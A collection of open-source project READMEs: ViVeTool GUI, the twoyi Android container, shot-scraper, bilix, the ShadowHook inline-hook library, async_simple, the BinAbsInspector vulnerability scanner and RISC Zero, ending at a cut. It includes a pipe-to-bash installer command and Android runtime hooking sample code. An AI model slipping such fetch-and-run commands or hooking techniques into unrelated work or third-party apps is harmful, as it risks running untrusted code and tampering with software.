What is ViVeTool GUI? ViVeTool GUI lets you easily enable, disable and search for new hidden Features in Windows Insider Builds, with the use of a button and a pretty UI.

Disclaimer: No one, including me / PeterStrick, the creators of ViVe and ViVeTool, or the creators of mach2, is responsible for any damage or unintended side effects this program might cause to your computer by changing the Windows Feature Store. Use this program at your own risk.

How to use it? Using it is simple. Either: Select the Build for which you want to enable or disable features. Wait for it to load in, open one of the Groups by pressing the Arrow, and select the Feature that you are looking for. Press on Perform Action and perform your desired action for the entered feature ID. Or: 1. Press on "Manually change a Feature" (F12) 2. Enter a Feature ID 3. Press on Perform Action and perform your desired action for the selected feature.

What are the additional features? Apart from being able to manage features, ViVeTool GUI also lets you: - Load in a Feature List of other Builds - Search for Features - Sort Features by Feature Name, Feature ID or Feature State - Group Features by: Always Enabled, Always Disabled, Enabled by Default, Disabled by Default and Modifiable - Copy Feature Names and IDs by right-clicking them - Switch between Dark and Light Mode (the setting gets saved and applied on start) - Automatically load the latest Feature List when starting ViVeTool GUI - Scan a Windows Build for Hidden Features to create your own Feature List - Use ViVeTool GUI in multiple translated Languages - Fix the LastKnownGood Store, as well as the A/B Testing Priorities for ViVeTool Features - and at last, view the About Box by either pressing the About Icon or selecting the "About..." item in the Application System Menu.

What are the System Requirements? Since ViVeTool GUI uses the ViVe API, Windows 10 Build 18963 (Version 2004) and newer is the only OS requirement. Apart from that, the only requirement is .NET Framework 4.8.

Why not just use ViVeTool? Using ViVeTool GUI is easier and more user-friendly; besides, it also lets you search for features and enable them with a few clicks.

Licensing: ViVeTool GUI uses icons from icons8.com. ViVeTool GUI is inspired by ViVeTool and uses the ViVe API. ViVeTool GUI uses files from mach2 for the Build Combo Box. ViVeTool GUI - Feature Scanner uses mach2 to create its Feature Lists.;Windows Feature Control GUI based on ViVe / ViVeTool;windows10,windows-10,windows11,windows-11,windows,windows-features,vive,vivetool,mach2,feature-control
PeterStrick/ViVeTool-GUI
twoyi/twoyi;Due to the complexity of the project and the lack of any revenue, the project has been discontinued.

Twoyi Platform: A lightweight Android container [![contributions welcome](https://img.shields.io/badge/Contributions-welcome-brightgreen?logo=github)](CODE_OF_CONDUCT.md) [![Website](https://img.shields.io/badge/Website-available-brightgreen?logo=e)](https://twoyi.io) Made with ❤︎ by weishu README 中文版

Introduction: Twoyi is a lightweight Android container. It runs a nearly complete Android system as a normal app (no root required) on Android, and it supports Android 8.1 ~ 12.

Capability: Use Taichi·Yang without unlocking the bootloader. Xposed, EdXposed and LSPosed will be supported. Use root on non-rooted devices. Use a few Magisk modules. Implement additional system components such as a virtual camera by virtualizing the HAL layer. Do security research such as unpacking (shelling).

Features: Twoyi is a rootless Android system-level container, which runs a nearly complete Android system as a normal app and is mostly isolated from the main system. The internal Android version is Android 8.1, and Android 10 will be supported. Booting up twoyi is very fast (within three seconds) except for the initialization process. Twoyi is an open source project. The internal system of twoyi will be fully customizable. Because its system is open source, you can fork the project to compile your own system. You can also customize the system components, such as the HAL layer, to implement virtual cameras, virtual sensors and other special features.

Building: Twoyi contains two parts: the twoyi app, which is actually a UI rendering engine, and the internal ROM of twoyi. This repository contains the twoyi app; the twoyi ROM is currently in the process of being open-sourced. Therefore, at this moment, the ROM cannot be compiled from source yet.

Build the App manually

Install Rust: Twoyi is partially written in Rust, so it's necessary to install Rust and Cargo first.

Install cargo-xdk: Please refer to cargo-xdk. You can check whether it is installed by running ./gradlew cargoBuild. If it succeeded, you will see libtwoyi.so in app/src/main/jniLibs/arm64-v8a. P.S. Please use NDK v22 or lower, otherwise it may fail.

Integrating rootfs: Currently you cannot build the ROM yourself; instead, you can use the prebuilt ROM. To do that, extract rootfs.7z from the official release apk and copy it to app/src/main/assets.

Build the app with Android Studio: Build it with Android Studio normally.

Build the ROM: WIP

Discussion: Telegram Group Contact Me twsxtd@gmail.com;A lightweight Android container on Android;twoyi,virtual,android
twoyi/twoyi
simonw/shot-scraper;shot-scraper A command-line utility for taking automated screenshots of websites

For background on this project see shot-scraper: automated screenshots for documentation, built on Playwright.

Documentation: Full documentation for shot-scraper. Tutorial: Automating screenshots for the Datasette documentation using shot-scraper. Release notes.

Get started with GitHub Actions: To get started without installing any software, use the shot-scraper-template template to create your own GitHub repository which takes screenshots of a page using shot-scraper. See Instantly create a GitHub repository to take screenshots of a web page for details.

Quick installation: You can install the shot-scraper CLI tool using pip:

```
pip install shot-scraper
# Now install the browser it needs:
shot-scraper install
```

Taking your first screenshot: You can take a screenshot of a web page like this:

```
shot-scraper https://datasette.io/
```

This will create a screenshot in a file called datasette-io.png. Many more options are available, see Taking a screenshot for details.

Examples: The shot-scraper-demo repository uses this tool to capture recently spotted owls in El Granada, CA according to this page, and to generate an annotated screenshot illustrating a Datasette feature as described in my blog. The Datasette Documentation uses screenshots taken by shot-scraper running in the simonw/datasette-screenshots GitHub repository, described in detail in Automating screenshots for the Datasette documentation using shot-scraper. Ben Welsh built @newshomepages, a Twitter bot that uses shot-scraper and GitHub Actions to take screenshots of news website homepages and publish them to Twitter. The code for that lives in palewire/news-homepages. scrape-hacker-news-by-domain uses shot-scraper javascript to scrape a web page. See Scraping web pages from the command-line with shot-scraper for details of how this works. Reuters uses shot-scraper to generate regularly updating data dashboards for email newsletters.;A command-line utility for taking automated screenshots of websites;playwright,playwright-python,scraping,screenshot-utility,screenshots
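The scrape-hacker-news-by-domain example above relies on the shot-scraper javascript mode, which executes a JavaScript expression against a page and prints the result as JSON. A small illustration (the expression is just an example):

```bash
# Evaluate an expression in the context of the loaded page
shot-scraper javascript https://datasette.io/ "document.title"
```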
simonw/shot-scraper
HFrost0/bilix;bilix ⚡️Lightning-fast asynchronous download tool for bilibili and more

Features:
⚡️ Fast & Async: Asynchronous high-concurrency support, controllable concurrency and speed settings.
😉 Lightweight & User-friendly: Lightweight, user-friendly CLI with progress notification, focusing on core functionality.
📝 Fully-featured: Submissions, anime, TV series, video clips, audio, favourites, danmaku, covers...
🔨 Extensible: Extensible Python module suitable for more download scenarios.

Install:

```shell
pip install bilix
```

for macOS, you can also install bilix with brew:

```shell
brew install bilix
```

Usage Example: If you prefer to use the command line interface (CLI):

```shell
bilix v 'url'
```

v is a short method alias for get_video.

If you prefer to code with python:

```python
import asyncio
from bilix.sites.bilibili import DownloaderBilibili

async def main():
    async with DownloaderBilibili() as d:
        await d.get_video('url')

asyncio.run(main())
```

Community: If you find any bugs or other issues, feel free to raise an Issue. If you have new ideas or new feature requests 👍, welcome to participate in the Discussion. If you find this project helpful, you can support the author with a Star 🌟

Contribute: ❤️ Welcome! Details can be found in Contributing;⚡️Lightning-fast async download tool for bilibili and more;async,cli,download,python,asyncio,m3u8
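Since the downloader above is async, several videos can be scheduled concurrently with plain asyncio; a hedged sketch using only the documented get_video call (the URLs are placeholders):

```python
import asyncio
from bilix.sites.bilibili import DownloaderBilibili

# placeholder video URLs
urls = ['url1', 'url2', 'url3']

async def main():
    async with DownloaderBilibili() as d:
        # schedule all downloads; the downloader's internal
        # concurrency controls pace the actual transfers
        await asyncio.gather(*(d.get_video(u) for u in urls))

asyncio.run(main())
```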
HFrost0/bilix
bytedance/android-inline-hook;ShadowHook 简体中文

ShadowHook is an Android inline hook library which supports thumb, arm32 and arm64. ShadowHook is now used in TikTok, Douyin, Toutiao, Xigua Video, and Lark. If you need an Android PLT hook library, please move to ByteHook.

Features:
- Supports Android 4.1 - 14 (API level 16 - 34).
- Supports armeabi-v7a and arm64-v8a.
- Supports hooking a whole function, but does not support hooking at a position in the middle of a function.
- Supports specifying the hook location by "function address" or "library name + function name".
- Automatically completes the hook of newly loaded dynamic libraries (only for "library name + function name"), and calls the optional callback function after the hook is completed.
- Multiple hooks and unhooks can be executed concurrently on the same hook point without interfering with each other (only in shared mode).
- Automatically avoids possible recursive calls and circular calls between proxy functions (only in shared mode).
- The proxy function supports unwinding backtraces in the normal way (CFI, EH, FP).
- Integrated symbol address search function.
- MIT licensed.

Documentation: ShadowHook Manual

Quick Start: You can refer to the sample app in the app module, or refer to the hook/unhook examples of commonly used system functions in the systest module.

1. Add dependency in build.gradle. ShadowHook is published on Maven Central, and uses the Prefab package format for native dependencies, which is supported by Android Gradle Plugin 4.0+.

```Gradle
android {
    buildFeatures {
        prefab true
    }
}

dependencies {
    implementation 'com.bytedance.android:shadowhook:1.0.9'
}
```

Note: ShadowHook uses the prefab package schema v2, which is configured by default since Android Gradle Plugin 7.1.0. If you are using Android Gradle Plugin earlier than 7.1.0, please add the following configuration to gradle.properties:

```
android.prefabVersion=2.0.0
```

2. Add dependency in CMakeLists.txt or Android.mk.

CMakeLists.txt:

```CMake
find_package(shadowhook REQUIRED CONFIG)
add_library(mylib SHARED mylib.c)
target_link_libraries(mylib shadowhook::shadowhook)
```

Android.mk:

```
include $(CLEAR_VARS)
LOCAL_MODULE := mylib
LOCAL_SRC_FILES := mylib.c
LOCAL_SHARED_LIBRARIES += shadowhook
include $(BUILD_SHARED_LIBRARY)

$(call import-module,prefab/shadowhook)
```

3. Specify one or more ABI(s) you need.

```Gradle
android {
    defaultConfig {
        ndk {
            abiFilters 'armeabi-v7a', 'arm64-v8a'
        }
    }
}
```

4. Add packaging options. If you are using ShadowHook in an SDK project, you may need to avoid packaging libshadowhook.so into your AAR, so as not to encounter duplicate libshadowhook.so files when packaging the app project.

```Gradle
android {
    packagingOptions {
        exclude '**/libshadowhook.so'
    }
}
```

On the other hand, if you are using ShadowHook in an APP project, you may need to add some options to deal with conflicts caused by duplicate libshadowhook.so files.

```Gradle
android {
    packagingOptions {
        pickFirst '**/libshadowhook.so'
    }
}
```

5. Initialize. ShadowHook supports two modes (shared mode and unique mode). The proxy function in the two modes is written slightly differently. You can try the unique mode first.

```Java
import com.bytedance.shadowhook.ShadowHook;

public class MySdk {
    public static void init() {
        ShadowHook.init(new ShadowHook.ConfigBuilder()
            .setMode(ShadowHook.Mode.UNIQUE)
            .build());
    }
}
```
6. Hook and Unhook.

```C
#include "shadowhook.h"

void *shadowhook_hook_func_addr(void *func_addr, void *new_addr, void **orig_addr);
void *shadowhook_hook_sym_addr(void *sym_addr, void *new_addr, void **orig_addr);
void *shadowhook_hook_sym_name(const char *lib_name, const char *sym_name, void *new_addr, void **orig_addr);

typedef void (*shadowhook_hooked_t)(int error_number, const char *lib_name, const char *sym_name, void *sym_addr, void *new_addr, void *orig_addr, void *arg);

void *shadowhook_hook_sym_name_callback(const char *lib_name, const char *sym_name, void *new_addr, void **orig_addr, shadowhook_hooked_t hooked, void *hooked_arg);

int shadowhook_unhook(void *stub);
```

- shadowhook_hook_func_addr: hook a function (which has no symbol info in the ELF) by absolute address.
- shadowhook_hook_sym_addr: hook a function (which has symbol info in the ELF) by absolute address.
- shadowhook_hook_sym_name: hook a function by symbol name and ELF file name or path name.
- shadowhook_hook_sym_name_callback: similar to shadowhook_hook_sym_name, but the specified callback function will be called after the hook is completed.
- shadowhook_unhook: unhook.

For example, let's try to hook art::ArtMethod::Invoke:

```C
void *orig = NULL;
void *stub = NULL;

typedef void (*type_t)(void *, void *, uint32_t *, uint32_t, void *, const char *);

void proxy(void *thiz, void *thread, uint32_t *args, uint32_t args_size, void *result, const char *shorty) {
    // do something
    ((type_t)orig)(thiz, thread, args, args_size, result, shorty);
    // do something
}

void do_hook() {
    stub = shadowhook_hook_sym_name(
        "libart.so",
        "_ZN3art9ArtMethod6InvokeEPNS_6ThreadEPjjPNS_6JValueEPKc",
        (void *)proxy,
        (void **)&orig);

    if (stub == NULL) {
        int err_num = shadowhook_get_errno();
        const char *err_msg = shadowhook_to_errmsg(err_num);
        LOG("hook error %d - %s", err_num, err_msg);
    }
}

void do_unhook() {
    shadowhook_unhook(stub);
    stub = NULL;
}
```

_ZN3art9ArtMethod6InvokeEPNS_6ThreadEPjjPNS_6JValueEPKc is the symbol name of art::ArtMethod::Invoke after C++ name mangling in libart.so. You can use readelf to view it. C functions do not have mangled names. The symbol name of art::ArtMethod::Invoke is different in Android versions earlier than Android M; this example only applies to Android M and later. If you want better Android version compatibility, you need to handle the differences in function symbol names yourself.

Contributing: Code of Conduct, Contributing Guide, Reporting Security vulnerabilities.

License: ShadowHook is licensed by MIT License. ShadowHook uses the following third-party source code or libraries: queue.h BSD 3-Clause License Copyright (c) 1991, 1993 The Regents of the University of California. tree.h BSD 2-Clause License Copyright (c) 2002 Niels Provos provos@citi.umich.edu. linux-syscall-support BSD 3-Clause License Copyright (c) 2005-2011 Google Inc. xDL MIT License Copyright (c) 2020-2023 HexHacking Team;:fire: ShadowHook is an Android inline hook library which supports thumb, arm32 and arm64.;android,inline,hook,inlinehook,androidinlinehook,arm,arm64,thumb,security,ndk
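To complement the ArtMethod example above, here is a smaller hedged sketch (not from the original manual) that hooks libc's open with shadowhook_hook_sym_name in unique mode; note that open() is variadic, so this sketch assumes the common three-argument form:

```C
#include <fcntl.h>
#include <sys/types.h>
#include "shadowhook.h"

// Illustrative only: assumes the three-argument form of open().
static int (*orig_open)(const char *, int, mode_t) = NULL;
static void *open_stub = NULL;

static int open_proxy(const char *pathname, int flags, mode_t mode) {
    // inspect or log pathname here, then forward to the original
    return orig_open(pathname, flags, mode);
}

static void hook_open(void) {
    open_stub = shadowhook_hook_sym_name(
        "libc.so", "open",
        (void *)open_proxy, (void **)&orig_open);
}
```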
bytedance/android-inline-hook
alibaba/async_simple;async_simple A Simple, Light-Weight Asynchronous C++ Framework English | 中文

async_simple is a library offering simple, light-weight and easy-to-use components to write asynchronous code. The components offered include Lazy (based on C++20 stackless coroutines), Uthread (based on stackful coroutines) and the traditional Future/Promise.

Quick Experience: We can try async_simple online in compiler-explorer: https://compiler-explorer.com/z/Tdaesqsqj. Note that Uthread cannot be used in compiler-explorer since it requires installation.

Get Started: Our documents are hosted by GitHub Pages, go to Get Started. After installing and reading Lazy to get familiar with the API, here is a demo that uses Lazy to count chars in a file.

Install async_simple

By Vcpkg: vcpkg is a cross-platform package manager.

```
./vcpkg install async-simple
```

By CMake:

```
git clone -b main --single-branch --depth 1 https://github.com/alibaba/async_simple.git
cd async_simple
mkdir build
cd build
cmake .. -DASYNC_SIMPLE_ENABLE_TESTS=OFF -DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF -DASYNC_SIMPLE_ENABLE_ASAN=OFF
cmake --build .
cmake --install . # --prefix ./user_defined_install_path
```

Import async_simple: After installing async_simple, you can import it into your project.

By cmake find_package: please add the following cmake code:

```cmake
find_package(async_simple REQUIRED)
target_link_libraries(<your-target-name> PRIVATE async_simple::async_simple) # dynamic_link
# async_simple::async_simple_header_only
# async_simple::async_simple_static
```

<your-target-name> is the name of the target which wants to use async_simple.

Manually: async_simple is almost header-only, so you can just pass the include path of the install location to your compiler. But the uthread part of async_simple is not header-only. If you want to use uthread, you need to link it manually. The library file is in the install path.

Compiler Requirement: Required compiler: clang (>= 10.0.0) or gcc (>= 10.3) or Apple-clang (>= 14). Note that we need to add the -Wno-maybe-uninitialized option when we use gcc 12, due to a false positive diagnostic message by gcc 12. If you're using async_simple::Generator, there may be some compiler bugs in clang15; we suggest using clang17 or higher for that. If you meet any problem with MSVC Compiler Error C4737, try adding the /EHa option to fix it.

Develop async_simple: The build of async_simple requires libaio, googletest and cmake. Both libaio and googletest are optional. (Testing before using is highly suggested.) By default, async_simple tries to clone googletest from git to make sure the version used is correct. But in case users have network problems, they can install the gtest libraries by the following instructions and use the CMake variables ('GTEST_INCLUDE_DIR', 'GTEST_LIBRARIES', 'GMOCK_INCLUDE_DIR', 'GMOCK_LIBRARIES') to specify the location.

Using apt (Ubuntu and Debian):

```bash
# Install libaio
sudo apt install libaio-dev -y
# Install cmake
sudo apt install cmake -y
# Install bazel
# See: https://bazel.build/install/ubuntu
```

- Use `apt` to install gtest and gmock:

```bash
sudo apt install -y libgtest-dev libgmock-dev
```

- Try to build gtest and gmock from source:

```bash
# Install gtest
sudo apt install libgtest-dev -y
sudo apt install cmake -y
cd /usr/src/googletest/gtest
sudo mkdir build && cd build
sudo cmake .. && sudo make install
cd .. && sudo rm -rf build
cd /usr/src/googletest/gmock
sudo mkdir build && cd build
sudo cmake .. && sudo make install
cd .. && sudo rm -rf build
# Install bazel
# See: https://bazel.build/install/ubuntu
```

Using yum (CentOS and Fedora):

```bash
# Install libaio
sudo yum install libaio-devel -y
# Use `yum` to install gtest and gmock
sudo yum install gtest-devel gmock-devel
```

- Or try to build gtest and gmock from source.

Using Pacman (Arch):

```bash
# Optional
sudo pacman -S libaio
# Use cmake to build the project
sudo pacman -S cmake gtest
# Use bazel to build the project
sudo pacman -S bazel
```

Using Homebrew (macOS):

```bash
# Use cmake to build the project
brew install cmake
brew install googletest
# Use bazel to build the project
brew install bazel
```

Windows:

```powershell
# Install cmake
winget install cmake
# Install google-test
# TODO
# Install bazel
# See: https://bazel.build/install/windows
```

Build Dependencies From Source:

```
# libaio (optional); you can skip this if you installed libaio from packages
git clone https://pagure.io/libaio.git
cd libaio
sudo make install

# gmock and gtest
git clone git@github.com:google/googletest.git -b v1.8.x
cd googletest
mkdir build && cd build
cmake .. && sudo make install
```

Demo example dependency: The demo example depends on standalone asio (https://github.com/chriskohlhoff/asio/tree/master/asio), commit id: f70f65ae54351c209c3a24704624144bfe8e70a3

Build

cmake:

```bash
$ mkdir build && cd build
# Specify [-DASYNC_SIMPLE_ENABLE_TESTS=OFF] to skip tests.
# Specify [-DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF] to skip building the demo example.
# Specify [-DASYNC_SIMPLE_DISABLE_AIO=ON] to skip building with libaio.
CXX=clang++ CC=clang cmake ../ -DCMAKE_BUILD_TYPE=[Release|Debug] [-DASYNC_SIMPLE_ENABLE_TESTS=OFF] [-DASYNC_SIMPLE_BUILD_DEMO_EXAMPLE=OFF] [-DASYNC_SIMPLE_DISABLE_AIO=ON] [-DGMOCK_INCLUDE_DIR= -DGTEST_INCLUDE_DIR= -DGTEST_LIBRARIES= -DGMOCK_LIBRARIES= ]
# for gcc, use CXX=g++ CC=gcc
make -j4
make test # optional
make install # sudo if required
```

Conan is also supported. You can install async_simple into the conan local cache:

```
mkdir build && cd build
conan create ..
```

bazel:

```bash
# Specify [--define=ASYNC_SIMPLE_DISABLE_AIO=true] to skip building with libaio
# Example: bazel build --define=ASYNC_SIMPLE_DISABLE_AIO=true ...
bazel build ... # compile all targets
bazel build ...:all # compile all targets
bazel build ...:* # compile all targets
bazel build -- ... -benchmarks/... # compile all targets except those beneath benchmarks
bazel test ... # compile and execute tests
# Compile a specific target
# Format: bazel [build|test|run] [directory name]:[binary name]
bazel build :async_simple # only compile libasync_simple
bazel run benchmarks:benchmarking # compile and run benchmark
bazel test async_simple/coro/test:async_simple_coro_test
# Use the clang toolchain
bazel build --action_env=CXX=clang++ --action_env=CC=clang ...
# Add compile options
bazel build --copt='-O0' --copt='-ggdb' ...
```

- See [this](https://bazel.build/run/build) to get more information.
- ... indicates recursively scanning all targets. It is recognized as ../.. in oh-my-zsh, so it can be run in another shell or via bash -c 'command', such as bash -c 'bazel build ...', or use bazel build ...:all.
- To use async_simple as a dependency, see also bazel support.

Docker Compile Environment:

```
git clone https://github.com/alibaba/async_simple.git
cd async_simple/docker/(ubuntu|centos7|rockylinux)
docker build . --no-cache -t async_simple:1.0
docker run -it --name async_simple async_simple:1.0 /bin/bash
```

Performance: We also give a Quantitative Analysis Report of Lazy (based on C++20 stackless coroutines) and Uthread (based on stackful coroutines).
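For a feel of what the Lazy side of that comparison looks like in code, here is a minimal hedged sketch (assuming the async_simple/coro/Lazy.h and SyncAwait.h headers used throughout the project's examples):

```cpp
#include <async_simple/coro/Lazy.h>
#include <async_simple/coro/SyncAwait.h>
#include <iostream>

// A stackless coroutine that produces its result lazily.
async_simple::coro::Lazy<int> add(int a, int b) {
    co_return a + b;
}

// Lazy values compose with co_await inside another Lazy.
async_simple::coro::Lazy<int> addTwice(int a, int b) {
    int first = co_await add(a, b);
    co_return co_await add(first, b);
}

int main() {
    // syncAwait blocks the current thread until the coroutine finishes.
    int result = async_simple::coro::syncAwait(addTwice(1, 2));
    std::cout << result << std::endl; // prints 5
    return 0;
}
```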
C++20 Modules Support

We have experimental support for C++20 Modules in modules/async_simple.cppm. We can build the async_simple module with xmake and cmake. We can find the related usage in CountChar, ReadFiles, LazyTest.cpp and FutureTest.cpp. We need clang (>= d18806e6733 or simply clang 16) to build the async_simple module. It is only tested with libstdc++10.3. Due to the current support status for C++20, it won't be a surprise if the compilation fails with higher versions of the STL.

We can build the async_simple module with xmake (>= 0eccc6e) using the command:

```
xmake
```

We can build the async_simple module with cmake (>= d18806e673 or cmake 3.26 and up) using the following commands:

```
mkdir build_modules && cd build_modules
CC=clang CXX=clang++ cmake .. -DCMAKE_BUILD_TYPE=Release -DASYNC_SIMPLE_BUILD_MODULES=ON -GNinja
ninja
```

Note that the async_simple module in the main branch is actually a named-module wrapper for the headers, for compatibility. We can find the practical usage of C++20 Modules in https://github.com/alibaba/async_simple/tree/CXX20Modules, which contains the support for xmake and cmake as well.

Questions: For questions, we suggest reading the docs, issues and discussions first. If there is no satisfying answer, you could file an issue or start a thread in discussions. Specifically, for defect reports or feature enhancements, it'd be better to file an issue; for how-to-use questions, it'd be better to start a thread in discussions.

How to Contribute: Read the How to fix issue document first. Run the tests and git-clang-format HEAD^ locally for the change. Note that the version of clang-format in CI is clang-format 14, so it is possible that your local format result is inconsistent with the format result in CI. In that case, you need to install the newer clang-format or adopt the suggested change by hand. In case the format result is not good, it is OK to accept the PR temporarily and file an issue for the clang-format. Create a PR and fill in the PR template. Choose one or more reviewers from the contributors (e.g., ChuanqiXu9, RainMark, foreverhy, qicosmos). Get approved and merged.

License: async_simple is distributed under the Apache License (Version 2.0). This product contains various third-party components under other open source licenses. See the NOTICE file for more information.;Simple, light-weight and easy-to-use asynchronous components;asynchronous,coroutines,cpp20,modules,cpp20-modules
alibaba/async_simple
KeenSecurityLab/BinAbsInspector;What is BinAbsInspector?

BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, a long-term research project incubated at Keenlab. It is based on abstract interpretation with support from Ghidra, and works on Ghidra's Pcode instead of assembly. Currently it supports binaries on x86, x64, armv7 and aarch64.

Installation

- Install Ghidra according to Ghidra's documentation
- Install Z3 (tested version: 4.8.15). Note that there are generally two parts to the Z3 library: the Java package and the native library. The Java package is already included in the "/lib" directory, but we suggest replacing it with your own Java package for version compatibility.
  - For Windows, download a pre-built package from here, extract the zip file and add a PATH environment variable pointing to z3-${version}-win/bin
  - For Linux, installing with a package manager is NOT recommended; there are two options: download a suitable pre-built package from here, extract the zip file and copy z3-${version}-glibc-${version}/bin/*.so to /usr/local/lib/, or build and install Z3 according to Building Z3 using make and GCC/Clang
  - For macOS, it is similar to Linux.
- Download the extension zip file from the release page
- Install the extension according to Ghidra Extension Notes

Building

Build the extension yourself if you want to develop a new feature; please refer to the development guide.

- Install Ghidra and Z3
- Install Gradle 7.x (tested version: 7.4)
- Pull the repository
- Run `gradle buildExtension` under the repository root
- The extension will be generated at dist/${GhidraVersion}_${date}_BinAbsInspector.zip

Usage

You can run BinAbsInspector in headless mode, GUI mode, or with Docker.

With Ghidra headless mode (a runnable Python wrapper for this command is sketched after this section):

```
$GHIDRA_INSTALL_DIR/support/analyzeHeadless <projectPath> <projectName> -import <file> -postScript BinAbsInspector "@@<scriptParams>"
```

- `<projectPath>` -- Ghidra project path.
- `<projectName>` -- Ghidra project name.
- `<scriptParams>` -- The arguments for our analyzer, providing the following options:

| Parameter | Description |
| --- | --- |
| [-K <kElement>] | KSet size limit K |
| [-callStringK <callStringMaxLen>] | Call string maximum length K |
| [-Z3Timeout <timeout>] | Z3 timeout |
| [-timeout <timeout>] | Analysis timeout |
| [-entry <address>] | Entry address |
| [-externalMap <file>] | External function model config |
| [-json] | Output in json format |
| [-disableZ3] | Disable Z3 |
| [-all] | Enable all checkers |
| [-debug] | Enable debugging log output |
| [-check "<cweNo1>[;<cweNo2>...]"] | Enable specific checkers |

With Ghidra GUI:

1. Run Ghidra and import the target binary into a project
2. Analyze the binary with default settings
3. When the analysis is done, open Window -> Script Manager and find BinAbsInspector.java
4. Double-click on the BinAbsInspector.java entry, set the parameters in the configuration window and click OK
5. When the analysis is done, you can see the CWE reports in the console window; double-clicking an address in the report jumps to the corresponding location

With Docker:

```shell
git clone git@github.com:KeenSecurityLab/BinAbsInspector.git
cd BinAbsInspector
docker build . -t bai
docker run -v $(pwd):/data/workspace bai "@@<script parameters>" -import <file>
```

Implemented Checkers

So far BinAbsInspector supports the following checkers:

- CWE78 (OS Command Injection)
- CWE119 (Buffer Overflow (generic case))
- CWE125 (Buffer Overflow (Out-of-bounds Read))
- CWE134 (Use of Externally-Controlled Format String)
- CWE190 (Integer Overflow or Wraparound)
- CWE367 (Time-of-check Time-of-use (TOCTOU))
- CWE415 (Double Free)
- CWE416 (Use After Free)
- CWE426 (Untrusted Search Path)
- CWE467 (Use of sizeof() on a Pointer Type)
- CWE476 (NULL Pointer Dereference)
- CWE676 (Use of Potentially Dangerous Function)
- CWE787 (Buffer Overflow (Out-of-bounds Write))

Project Structure

The structure of this project is as follows; please refer to the technical details or the Chinese version article for more details.

```
├── main
│   ├── java
│   │   └── com
│   │       └── bai
│   │           ├── checkers      checker implementation
│   │           ├── env
│   │           │   ├── funcs     function modeling
│   │           │   │   ├── externalfuncs   external function modeling
│   │           │   │   └── stdfuncs        cpp std modeling
│   │           │   └── region    memory modeling
│   │           ├── solver        analysis core and graph module
│   │           └── util          utilities
│   └── resources
└── test
```

You can also build the javadoc with `gradle javadoc`; the API documentation will be generated in ./build/docs/javadoc.

Acknowledgement

We employ Ghidra as our foundation and frequently leverage JImmutable Collections for better performance. Here we would like to thank them for their great help!;BinAbsInspector: Vulnerability Scanner for Binaries;binary-analysis,ghidra,reverse-engineering,security,static-analyzer,vulnerability-scanner,abstract-interpretation
KeenSecurityLab/BinAbsInspector
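As a convenience for the headless mode documented above, here is a minimal Python sketch that shells out to Ghidra's analyzeHeadless with BinAbsInspector's documented script parameters. It is illustrative, not part of the project: the Ghidra install path, project location, and chosen flags are assumptions you would adapt.

```python
import os
import subprocess
import sys

def run_binabsinspector(binary: str, checks: str = "CWE416;CWE476", timeout: int = 3600) -> int:
    """Run BinAbsInspector in Ghidra headless mode on one binary (sketch)."""
    ghidra = os.environ.get("GHIDRA_INSTALL_DIR", "/opt/ghidra")  # assumed install path
    cmd = [
        f"{ghidra}/support/analyzeHeadless",
        "/tmp/bai_project",    # hypothetical Ghidra project path
        "bai_project",         # hypothetical Ghidra project name
        "-import", binary,
        "-postScript", "BinAbsInspector",
        # The quotes in the README's `-check "<cweNo1>[;...]"` form are shell quoting;
        # with subprocess's list form no shell is involved, so they are omitted here.
        f"@@-check {checks} -json -timeout {timeout}",
    ]
    # analyzeHeadless prints the CWE report to stdout; capture it for post-processing.
    result = subprocess.run(cmd, capture_output=True, text=True)
    print(result.stdout)
    return result.returncode

if __name__ == "__main__":
    sys.exit(run_binabsinspector(sys.argv[1]))
```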
risc0/risc0;
> [!IMPORTANT]
> main is the development branch. When building applications or running examples, use the latest release instead.

RISC Zero is a zero-knowledge verifiable general computing platform based on zk-STARKs and the RISC-V microarchitecture.

A zero-knowledge proof allows one party (the prover) to convince another party (the verifier) that something is true without revealing all the details. In the case of RISC Zero, the prover can show they correctly executed some code (known to both parties), while only revealing to the verifier the output of the code, not any of its inputs or any state during execution.

The code runs in a special virtual machine, called a zkVM. The RISC Zero zkVM emulates a small RISC-V computer, allowing it to run arbitrary code in any language, so long as a compiler toolchain exists that targets RISC-V. Currently, SDK support exists for Rust, C, and C++.

Protocol overview and terminology

First, the code to be proven must be compiled from its implementation language into a method. A method is represented by a RISC-V ELF file with a special entry point that runs the code of the method. Additionally, one can compute for a given method its image ID, which is a special type of cryptographic hash of the ELF file, and is required for verification.

Next, the host program runs and proves the method inside the zkVM. The logical RISC-V machine running inside the zkVM is called the guest, and the prover running the zkVM is called the host. The guest and the host can communicate with each other during the execution of the method, but the host cannot modify the execution of the guest in any way, or the proof being generated will be invalid. During execution, the guest code can write to a special append-only log called the journal, which represents the official output of the computation.

Presuming the method terminated correctly, a receipt is produced, which provides the proof of correct execution. This receipt consists of 2 parts: the journal written during execution and a blob of opaque cryptographic data called the seal.

The verifier can then verify the receipt and examine the log. If any tampering was done to the journal or the seal, the receipt will fail to verify. Additionally, it is cryptographically infeasible to generate a valid receipt unless the output of the journal is the exactly correct output for some valid execution of the method whose image ID matches the receipt. In summary, the receipt acts as a zero-knowledge proof of correct execution. (A toy model of this data flow is sketched after this section.)

Because the protocol is zero-knowledge, the verifier cannot infer anything about the details of the execution or any data passed between the host and the guest (aside from what is implied by the data written to the journal and the correct execution of the code).

Security

This code implements a three-layer recursive proof system, based on the well-studied zk-STARK protocol and Groth16 protocol. An overview of the underlying cryptographic assumptions can be found on our Security Model page. With default parameters, this system achieves perfect zero-knowledgeness and 98 bits of conjectured security. Our STARK protocol is described in Scalable, Transparent Arguments of RISC-V Integrity, and a soundness/security calculator is included in the soundness.rs file. To run the calculator, use RUST_LOG=risc0_zkp=debug when running a proof.

Getting Started

To start your own project, you can use our cargo risczero tool to write the initial boilerplate and set up a standard directory structure.

First, install Rust if you don't already have it, then install the RISC Zero toolchain installer, rzup. We'll use rzup to install cargo-risczero.

To install rzup, run the following command and follow the instructions:

```bash
curl -L https://risczero.com/install | bash
```

Next we can install the RISC Zero toolchain by running rzup:

```bash
rzup
```

You can verify the installation was successful by running:

```bash
cargo risczero --version
```

After installation, you can create a new project (named my_project in this example):

```bash
cargo risczero new my_project
```

More details and options for cargo risczero are given in its README.

For more guidance on how to use RISC Zero, how RISC Zero projects are typically structured, and other resources useful to developers new to RISC Zero, see our Getting Started page.

Building from source

